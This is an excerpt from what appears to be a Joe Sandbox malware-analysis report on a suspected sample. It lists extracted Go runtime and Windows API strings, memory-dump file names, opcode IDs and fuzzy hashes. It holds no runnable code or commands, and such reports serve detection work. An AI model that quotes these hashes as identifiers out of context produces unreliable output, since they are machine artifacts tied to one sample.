                      • Instruction Fuzzy Hash: 6071B076615B88C2DB50EF55F0407AEB7A6F788B84F99512AEB8C43B29CF78C451CB00
                      Strings
                      • runtime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x] (types from different packages)28421709430404007434844970703125CertAddCertificateContextToStoreCertVerif, xrefs: 0068CAFE
                      • persistentalloc: size == 0required key not availableruntime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to meuse of invalid sweepLocker not in stack roots range [3637978807091712951660156, xrefs: 0068CB45
                      • persistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: createevent failed; errno=ryuFtoaFixed32 called with prec > 9too many Questions to pack (>65535)traceback did not unwind completelytransport endpo, xrefs: 0068CB1F
                      • persistentalloc: align is not a power of 2runtime: blocked write on closing polldescsync/atomic: store of nil value into Valueunexpected signal during runtime executiongcBgMarkWorker: unexpected gcMarkWorkerModegrew heap, but no adequate free space foundheapBi, xrefs: 0068CB30
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: persistentalloc: align is not a power of 2runtime: blocked write on closing polldescsync/atomic: store of nil value into Valueunexpected signal during runtime executiongcBgMarkWorker: unexpected gcMarkWorkerModegrew heap, but no adequate free space foundheapBi$persistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: createevent failed; errno=ryuFtoaFixed32 called with prec > 9too many Questions to pack (>65535)traceback did not unwind completelytransport endpo$persistentalloc: size == 0required key not availableruntime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to meuse of invalid sweepLocker not in stack roots range [3637978807091712951660156$runtime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x] (types from different packages)28421709430404007434844970703125CertAddCertificateContextToStoreCertVerif
                      • API String ID: 0-3020361985
                      • Opcode ID: 73dab45d75cbff17c985ceccc9084b7bc2e31fd375ac38a56020e1224a60750e
                      • Instruction ID: 9fab50836bdc5abef62b8de81df235c7b0182fe68ccdc353e5e7baa5394ff15b
                      • Opcode Fuzzy Hash: 73dab45d75cbff17c985ceccc9084b7bc2e31fd375ac38a56020e1224a60750e
                      • Instruction Fuzzy Hash: 98618B72605B86C6DB10EF05E08039AB7A6F745BE4F449226EB9D17B28DF3CC495C710
                      Strings
                      • startm: m has pstopm holding pwglGetCurrentDC already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625AdjustWindowRectBringWindowToTopCloseEnhMetaFileCoCreateInstanceCoGetClassObjectConnect, xrefs: 006B96A7
                      • startm: negative nmspinningstopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionswork.nwait was > work.nproc args stack map entries for 18189894035458564758300781259094947017729282379150390625Aus Central W., xrefs: 006B95FA
                      • startm: p has runnable gsstoplockedm: not runnableunexpected fault address unexpected key value typewglGetLayerPaletteEntrieswglSetLayerPaletteEntries1455191522836685180664062572759576141834259033203125AddClipboardFormatListenerBougainville Standard TimeCentra, xrefs: 006B9696
                      • startm: m is spinningstate not recoverabletimer data corruptionunexpected value stepwglCreateLayerContextwglDescribeLayerPlane/lib/time/zoneinfo.zip4656612873077392578125Aleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWCo, xrefs: 006B96B8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: startm: m has pstopm holding pwglGetCurrentDC already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625AdjustWindowRectBringWindowToTopCloseEnhMetaFileCoCreateInstanceCoGetClassObjectConnect$startm: m is spinningstate not recoverabletimer data corruptionunexpected value stepwglCreateLayerContextwglDescribeLayerPlane/lib/time/zoneinfo.zip4656612873077392578125Aleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWCo$startm: negative nmspinningstopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionswork.nwait was > work.nproc args stack map entries for 18189894035458564758300781259094947017729282379150390625Aus Central W.$startm: p has runnable gsstoplockedm: not runnableunexpected fault address unexpected key value typewglGetLayerPaletteEntrieswglSetLayerPaletteEntries1455191522836685180664062572759576141834259033203125AddClipboardFormatListenerBougainville Standard TimeCentra
                      • API String ID: 0-3785498658
                      • Opcode ID: 802bf99156a1e1afac606addc95b77eb3184b8ac36292c3ba1f4b3a1f724594e
                      • Instruction ID: ecbfc40fa9dd86c92bbc81baef5421b1e5fc26bef5563f7c96da17ed70cdf70a
                      • Opcode Fuzzy Hash: 802bf99156a1e1afac606addc95b77eb3184b8ac36292c3ba1f4b3a1f724594e
                      • Instruction Fuzzy Hash: D061E4B2609780CADB64CB11E0807EA7762F7867A4F48562AEB9D077A5DB3CC585CB10
                      Strings
                      • bad sweepgen in refillcall not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc inv, xrefs: 006941FA
                      • refill of span with free space remainingruntime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 calle, xrefs: 0069420B
                      • span has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected method stepwglRealizeLayerPalettewirep: invalid p state) must be a power of 223283064365386962890625<invalid reflect.Value>Argentina Stand, xrefs: 006941D8
                      • out of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method wglShareListsxadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit19073, xrefs: 006941E9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: bad sweepgen in refillcall not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc inv$out of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method wglShareListsxadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit19073$refill of span with free space remainingruntime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 calle$span has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected method stepwglRealizeLayerPalettewirep: invalid p state) must be a power of 223283064365386962890625<invalid reflect.Value>Argentina Stand
                      • API String ID: 0-3402019271
                      • Opcode ID: 3cba9db118989a8e0d87bb838962b1a2ece24a40993c05ab12943750aef3e19c
                      • Instruction ID: 231cfea943650bc34e60d564f0e1f3f8afeca71d9434898231088b16a2ef1525
                      • Opcode Fuzzy Hash: 3cba9db118989a8e0d87bb838962b1a2ece24a40993c05ab12943750aef3e19c
                      • Instruction Fuzzy Hash: 5C51CC72605A9086CB50DF05E4803AE777AF788B94F884126EB8E07B69DF3CC986C750
                      Strings
                      • , fp:-09301562578125<nil>AdlamBamumBatakBuhidDograErrorGetDCGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arrayclosedeferfalsefaultgFreegcinggscanhchanhttpsimap2imap3imapsinit int16int32int64mheapntohspanicpop3sscav schedsleepslicesse41, xrefs: 006D3CB3
                      • stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewglGetProcAddresswrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125AddFontResourceE, xrefs: 006D3C98
                      • } stack=[ MB goal, flushGen gfreecnt= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdin12207031256103515625AdditionalAlphaBlendBad varintBeginPaintCancelIoExC, xrefs: 006D3CCF
                      • ), ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHa, xrefs: 006D3D0F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: ), ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHa$, fp:-09301562578125<nil>AdlamBamumBatakBuhidDograErrorGetDCGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arrayclosedeferfalsefaultgFreegcinggscanhchanhttpsimap2imap3imapsinit int16int32int64mheapntohspanicpop3sscav schedsleepslicesse41$stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewglGetProcAddresswrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125AddFontResourceE$} stack=[ MB goal, flushGen gfreecnt= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdin12207031256103515625AdditionalAlphaBlendBad varintBeginPaintCancelIoExC
                      • API String ID: 0-878102341
                      • Opcode ID: e749c8ee634cbd17a433cf7ccc8a720aabba11a96161349e39ed3ec4f78427e9
                      • Instruction ID: 8733c08f97aa9fdf6f0a6d4085b123d1274aa12e9b70876ed1e51b33fefe308d
                      • Opcode Fuzzy Hash: e749c8ee634cbd17a433cf7ccc8a720aabba11a96161349e39ed3ec4f78427e9
                      • Instruction Fuzzy Hash: 78412C72618F9486CB60DB05F4803AAB765F789B80F444126EBCD43B6ADF3CC5958B44